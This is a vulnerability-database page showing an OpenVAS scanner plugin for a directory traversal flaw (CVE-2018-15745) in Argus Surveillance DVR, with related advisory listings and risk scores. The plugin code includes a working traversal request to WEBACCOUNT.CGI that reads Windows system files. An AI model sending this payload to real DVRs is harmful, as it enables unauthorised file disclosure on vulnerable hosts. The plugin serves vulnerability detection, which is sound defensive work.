Lucene search
+L

Argus Surveillance DVR Multiple Vulnerabilities

🗓️ 29 Aug 2018 00:00:00Reported by Copyright (C) 2018 Greenbone AGType 
openvas
 openvas
🔗 plugins.openvas.org👁 243 Views

Argus Surveillance DVR Multiple Vulnerabilities. Prone to directory traversal and SYSTEM privilege escalatio

Related
Refs
Code
ReporterTitlePublishedViews
Family
zdt
zdt
Argus Surveillance DVR 4.0.0.0 Directory Traversal Vulnerability
29 Aug 201800:00
zdt
attackerkb
ATTACKERKB
CVE-2018-15745
30 Aug 201800:00
attackerkb
circl
Circl
CVE-2018-15745
29 Aug 201800:00
circl
checkpoint_advisories
Check Point Advisories
Argus Surveillance DVR Directory Traversal (CVE-2018-15745)
31 May 202000:00
checkpoint_advisories
cve
CVE
CVE-2018-15745
30 Aug 201817:00
cve
cvelist
Cvelist
CVE-2018-15745
30 Aug 201817:00
cvelist
exploitdb
Exploit DB
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
29 Aug 201800:00
exploitdb
metasploit
Metasploit
Argus Surveillance DVR 4.0.0.0 - Directory Traversal
1 Feb 202518:54
metasploit
nuclei
Nuclei
Argus Surveillance DVR 4.0.0.0 - Local File Inclusion
23 Jul 202603:49
nuclei
nvd
NVD
CVE-2018-15745
30 Aug 201817:29
nvd
Rows per page
# SPDX-FileCopyrightText: 2018 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

CPE = "cpe:/a:argus_surveillance:dvr";

if (description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.141409");
  script_version("2025-04-15T05:54:49+0000");
  script_tag(name:"last_modification", value:"2025-04-15 05:54:49 +0000 (Tue, 15 Apr 2025)");
  script_tag(name:"creation_date", value:"2018-08-29 14:19:28 +0700 (Wed, 29 Aug 2018)");
  script_tag(name:"cvss_base", value:"5.0");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:N/A:N");
  script_tag(name:"severity_vector", value:"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N");
  script_tag(name:"severity_origin", value:"NVD");
  script_tag(name:"severity_date", value:"2018-12-07 18:23:00 +0000 (Fri, 07 Dec 2018)");

  script_cve_id("CVE-2018-15745");

  script_tag(name:"qod_type", value:"exploit");

  script_tag(name:"solution_type", value:"WillNotFix");

  script_name("Argus Surveillance DVR Multiple Vulnerabilities");

  script_category(ACT_ATTACK);
  script_copyright("Copyright (C) 2018 Greenbone AG");
  script_family("Web application abuses");
  script_dependencies("gb_argus_surveillance_dvr_detect.nasl");
  script_mandatory_keys("argus_surveillance/installed");

  script_tag(name:"summary", value:"Argus Surveillance DVR is prone to multiple vulnerabilities.");

  script_tag(name:"insight", value:"Argus Surveillance DVR is prone to multiple vulnerabilities:

  - Directory traversal (CVE-2018-15745)

  - SYSTEM privilege escalation");

  script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
  of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
  release, disable respective features, remove the product or replace the product by another one.");

  script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");

  script_xref(name:"URL", value:"http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt");
  script_xref(name:"URL", value:"http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt");

  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");
include("traversal_func.inc");

if (!port = get_app_port(cpe: CPE))
  exit(0);

if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
  exit(0);

files = traversal_files("windows");

foreach file (keys(files)) {
  url = "/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=" + crap(data: "..%2F", length: 16*5) + files[file] +
        "&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=";

  if (http_vuln_check(port: port, url: url, pattern: file, check_header: TRUE)) {
    report = http_report_vuln_url(port: port, url: url);
    security_message(port: port, data: report);
    exit(0);
  }
}

exit(99);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Apr 2025 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 37.5
EPSS0.97709
243